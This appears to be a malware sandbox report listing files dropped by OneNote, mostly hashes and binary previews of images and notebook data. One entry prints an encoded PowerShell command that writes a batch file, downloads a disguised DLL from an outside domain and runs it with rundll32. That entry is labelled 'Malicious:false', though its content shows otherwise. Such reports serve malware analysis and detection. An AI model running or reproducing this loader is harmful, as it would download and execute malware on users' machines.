                                                                                                                                                                                                              SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1012 x 327
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11765
                                                                                                                                                                                                              Entropy (8bit):7.911655818336033
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
                                                                                                                                                                                                              MD5:B035F23C68CC9673E604FE5472F223D2
                                                                                                                                                                                                              SHA1:56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
                                                                                                                                                                                                              SHA-256:F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
                                                                                                                                                                                                              SHA-512:B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a..G.................................................................................................................................................................|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..|..~.................................................................................................................................................!.......,......G........H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):376
                                                                                                                                                                                                              Entropy (8bit):5.791466963001911
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSuaNaTxEkRcdCe/ydGx8vWHWm+CxhIEXr2:ssLgyaI4HPKC2EwgvBSrkmdhKEAWHB+D
                                                                                                                                                                                                              MD5:DE85AF8741A255BEE889294D26CB536A
                                                                                                                                                                                                              SHA1:DC1964B10E6D1513A5F414608DB4CD3F19B865E5
                                                                                                                                                                                                              SHA-256:A7785E460E6CF4B147A981BB91F62842D2386A23F00EAEEEFFF13E6C4DFE2F7D
                                                                                                                                                                                                              SHA-512:9D90493F9B366D5A238BA7BF398F3CB24A8DDD27817FF10A24B180A9CA62087C3A6B0D575CC7B36E6AC832EF0E476B3D8350F91333C5F13731E3AD421814115C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76485
                                                                                                                                                                                                              Entropy (8bit):7.79809544163696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                                                                              MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                                                                              SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                                                                              SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                                                                              SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.5246161936986637
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:8hs4s1lBngY+gnlEQzUkThFDn1O3t84oLgndaJI+:8hs4s1lBnlHVU3Ma6
                                                                                                                                                                                                              MD5:E94DDF5CD721FACCA42274F6CDA1D942
                                                                                                                                                                                                              SHA1:0BD9B0D67AC8F7BEDF8840CFD53A5892E41A1398
                                                                                                                                                                                                              SHA-256:3DC1D5A9871D19B5B351A7CE6930030619B504B8A29D097E09A44F086CA1221D
                                                                                                                                                                                                              SHA-512:0BB562C231A7237B5511A7B22000378C54D49887C1A14CF3DA9F46AC987C930542DE6B0DDA3696FEA11A9589BFE164B9BE97C068F2C2AC3EE05474C6539D027E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........x.......................................................................................................................................2...>...........x...,...2...>...X.......x........-S......-S...@H..`......Rr......Rrj.^L.w.4].%d.-S...@H..`......-S..Rrj.^L.w.4].%d.Rr...........................Rr...................................................................5......-......G.)9.....................Rr.........................................................'..F{.@.5..b.[7...............................L..I.d......h...N....................................................................'..F{.@.5..b.[7...............L..I.d............-S......-S..................................................-S..1...-SX.4.......................................................0...e.......d..I.M.F..n ]...pz.$-;...................4......(...(...........8.....?...............................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9012312896576654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:XaE567jclalXsDHjsD6rjXjgtn/llSK9dtJCRdVlZKQL1F3mVXED6JllsOxNHXpJ:X6MlalXsbjsYklEgR2FuEDoktE0
                                                                                                                                                                                                              MD5:8DC6F9FD87CFC81B314B9B09D86AB5D8
                                                                                                                                                                                                              SHA1:919C85CC5B2B109749BC25FD4E9DC97A1059008A
                                                                                                                                                                                                              SHA-256:3FC9CD3DD6E94BCCCC93AED05E969C5D6B49A1E96270F277528B6C9063C7CF5C
                                                                                                                                                                                                              SHA-512:BAEEE183816EB4820604ED2C1270FE6C5F5B0FE635E61677389C76BBE1500883DE2202D0AE5CD368172CEB99B75144AAAC8E5D70B5B586B0E825080023F34EBA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........x................................................................................................................................................................................................B..C...e..l..........D;..C.:.).....D;..C.:.)........B..C...e..l..................................................................................................5......-......G.)9..............................................................................%.|q-;OC.=+}.g}M...........................@B.iH...7.Y.....h...N...................................................................%.|q-;OC.=+}.g}M...........@B.iH...7.Y........................................................................6....`.1............................................................4..~...1...(...(.......Q.u.i.c.k. .N.o.t.e.s.......Q.u.i.c.k. .N.o.t.e.s...........1.......Q.u.i.c.k. .N.o.t.e.s.............................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.697949331746655
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:oOWb9+GxjzxyLdKxhEgLiUICKF8mEwBWbQ:ch+Mjz8LdihEgLPIC28DwgU
                                                                                                                                                                                                              MD5:AEBA9CDF13827B0EE0081A699FF46F62
                                                                                                                                                                                                              SHA1:75935183406057D68DFE863B9F1FF05050757EB0
                                                                                                                                                                                                              SHA-256:AA7065B232651B6B8177511EA2C765A02192A34AAC1639AD1AF90B1338296719
                                                                                                                                                                                                              SHA-512:D0F26655CE34F3A12341318DE5DB8EC6084DBA04113F5EC6E1095A0A3ABEF3FD559A6F74F45A0794DA0B7F145E8C8CE20CAC7F2D0E3EC1C50B96DAC179E544CF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:j..@...@<.......(.......................................................................................................................................j..@...@t.......(...............................ZS......ZS...]....].....s>......s>.NuE...1Y.E...`.z@..#..a......`....x....U..5p......k.L...v.j......k............k.......k..................................................`.......`.z@..#..a......k.......k.L...v.j....2.......^................... ...ZS...s>...`...k........k.........s>T.7....k.......kX......k..2....k..l.....T.N..k..T%q...m.T$........s>.........c..,0...e...B4.$..........C@RQ.H..B......Y..............................x....U..5p.k.......k....k/J...{F<..$u.".4..8..ua/j.$u...s>.NuE...1Y.E..s>..).zv:F......(.)......>..................x....U..5p...k.L...v.j.....).zv:F......(......k.......ZS...c..,0...e...B4.$...........I...M.....0...............................0...........e....4..................T.i.t.l.e.......|{....B.l...R......(....Y......(...D...L.e.c.t.u.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):4.694216053495659
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OBsZ0qpgLdL9Ybhf+gBws9yzXXVAwRiPw:OWN0d5YVfD4nSwRi
                                                                                                                                                                                                              MD5:8F3DA84064DF55D8B0115411676E28BB
                                                                                                                                                                                                              SHA1:503EC80EE4BB4D2562E4C313F124053670ECF506
                                                                                                                                                                                                              SHA-256:B7A0321C44FA8CD3AE810839A784BC1AD55CFD03EBF99281C7DBDF5CA89AD2AB
                                                                                                                                                                                                              SHA-512:69B0EA98ABEBCBE4D0578FB0B8124BD484299FDF3038754CDE6E9C8C329744AD5DE7682D79AECF1D687C42CD56138849A8651B8AC1F5A3C4144423A3A048288D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......D...v...8...................................................................................................................................2...>... .......v...l............................I.......I.qk..B.....LZw?..4...w?..|#..'..Tx...w?..|#..'..Tx...w?...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............6..........=.H....N...^................._..mG....`.9............@f....................................I.qk..B.....LZ.............6..........=.H.........6..........=.H.........w?......w?......w?..........................................w?.j....w?.T%...w?......w?...7..w?.H....w?. ....w?.$....w?...~...............;........4...4...4.............w?.:w?.Yw?.Zw?...z...y.. x.. ...........$........&..$...7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.7....................Hw?...z... ..$......................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40884
                                                                                                                                                                                                              Entropy (8bit):7.545929039957292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                              MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                              SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                              SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                              SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.391214765800034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:c6b5skvfH8LgmkH+0T9l91ut7FUYcsQXTPoRkbOBtkJo5XNV9c66Hh81qLzX4Gq1:cVOP43kLTV1gGxrTPoRkbOBtkWdxcJqH
                                                                                                                                                                                                              MD5:1C6F61E3F35256341FBB5F2C54BBC2DD
                                                                                                                                                                                                              SHA1:9CCA72D022060A7497186B7D2BDD4B41F9A633CF
                                                                                                                                                                                                              SHA-256:11B330D434E45D1BB4C55754F549DBC8904EC4BDB46A45AD73E796F956A4A74D
                                                                                                                                                                                                              SHA-512:A32955D7AF97FF65FB0A8ED914C4586D37745801261C290F9183EF803E8D7EBDBF603B92C86CBEDD4FFE6BECB309A65B0DC0D0EFEC8467999A4D223A9557E2D8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...v.......v.......@ ..X)..2...>...2.......v.......@...H(...........................................................................................................................................I.......I.qk..B.....LZ....H..........0^S..........0^S........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............oZ^.f....~..k./....N...^...............8X.....I...8_.4..................................................I.qk..B.....LZ............oZ^.f....~..k./................................................................................................j.......T%a.......5...............z......................M...............;........4...4...4................3...L...S...K.....z...y.. x.. ........ ..$...$........D..........7...7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.9....................................;.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24268
                                                                                                                                                                                                              Entropy (8bit):6.946124661664625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                              MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                              SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                              SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                              SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.638047335088087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Ts7oFDIPhjvGn5SxuZ2Mfa+9BuHX10WxVORpJOAI59ciWROUmgIvq7VCY:I0FsJjE5SxERfrLu31cRpJtIDc8qeqJ
                                                                                                                                                                                                              MD5:EFEE69ACB8327E8B41BB0A7A593B9F21
                                                                                                                                                                                                              SHA1:E361B7232B710367C4742852CF430FA210BCF4F6
                                                                                                                                                                                                              SHA-256:3734F255218780A808F8F17DF7980ED584D5ED98280D897D4680977F4259FFC3
                                                                                                                                                                                                              SHA-512:1DB40DD73D6B1F6F7EC4E4312EE89E3DFD48F98C7CC38C8FFD7679DF785221EEDC69F16EBFE25DBBB0E59FCBE50EECF0389BE952732113DAA5151D9A57A178F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...&...j...v...>.... ...,..2...>...........v.......@....+...........................................................................................................................................I.......I.qk..B.....LZ..N.N.....NY.Q.......<X..NY.Q.......<X..N..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............A.G.....-.<V.......N...^...................-.E.lV6...w............t....................................I.qk..B.....LZ............A.G.....-.<V......................................N.......N.......N...........................................Nj......NT(.....N.......N..@....N..c....N..p....N$.\.$..N$.................;........4...4...4...............N3..N...N..z...y.. x.. ...........$...........7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.6..............z.......R......................7............S.y.m.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39010
                                                                                                                                                                                                              Entropy (8bit):7.362726513389497
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                              MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                              SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                              SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                              SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.9005029259096204
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:zs+97lqSjjWHw+NqWxZKo888fgM4EqWCEp48iU1YPwYMXKEJMRJbXeilQRec6nze:ou7lFjyHw+Nqon8/X/mEp4XU1UwvXKc6
                                                                                                                                                                                                              MD5:06AD29E0413C366EA8A6AE3D640D10E6
                                                                                                                                                                                                              SHA1:5D48675BC35F385CBA53B7704BDB8AA8A98F4F4E
                                                                                                                                                                                                              SHA-256:9494D8947474E73C8ACFCF42BB2D00DED07D18934A0D012A8F73314040BECE13
                                                                                                                                                                                                              SHA-512:19D3A5AB0EB0B86E78B07EB90940B519F5DA01E4361CB3687B7188559A4065BE271D65FFBB14890C70DD1F8D50E29FA0C34CF3AFDD1CE81B4282EE0F3889082D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>......."...v....... ..."......>.......r...v...>...@....!...........................................................................................................................................I.......I.qk..B.....LZ.\(......\({....4<.=.C...\({....4<.=.C...\(...m.....k..F.....I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'...............(.:..#...,.vb....N...^................x=.x..K.....r.............r...............................z....I.qk..B.....LZ..............(.:..#...,.vb..................................\(......\(......\(.........................................\(......\({....4<.=.C.....8.....m.....k..F.2................................I................................\(j.....\(T&|...\(......\(..8.............Y...........$.7........!....z...,4. ............................"......$...7...............T.u.e.s.d.a.y.,. .J.u.l.y. .2.8.,.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59707
                                                                                                                                                                                                              Entropy (8bit):7.858445368171059
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                                                                                              MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                                                                                              SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                                                                                              SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                                                                                              SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.8618169795163952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Kqs/BV5CRt1K1597aBUH8V7hcWubJA1sDsc6HJ7p5XDRhRlbD:GpvCBKR7IV2OmYc6HJLDRhRlf
                                                                                                                                                                                                              MD5:4F4105988FD4E6987B48D43CE7ED50FF
                                                                                                                                                                                                              SHA1:66F10D7B89EA09E19ACC8145D5DAE00B21F750DE
                                                                                                                                                                                                              SHA-256:CADD5B9155DAA75F4FAA08A9FAD351059DDB33BD24088B76F24A18B8D76C1109
                                                                                                                                                                                                              SHA-512:8F60C19A816E3D320FBD6CE667C830AC86FA9FD2D4C90936D4430FF9F1DF9A3AE13FF88024B33F037E725B8EAA152AC789835A46491C9F5E3A84E6CB97386F24
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......H ...!..2...>...R...,...v.......@.... ...........................................................................................................................................I.......I.qk..B.....LZ..}.<.....}..=..,E.../...}..=..,E.../...}..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............|.........^/......N...^.....................I.xA=.T..............P...............................4....I.qk..B.....LZ.............|.........^/.....................................}.......}.......}...........................................}j......}T.q....}.......}..]....}H......} .@....}$......}..d...............;........4...4...4..............z.......R......................7............S.y.m.b.o.l.......................'..}%..}..z...,4. .......$>........4..p..7........................................;........4...4...4
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27862
                                                                                                                                                                                                              Entropy (8bit):7.238903610770013
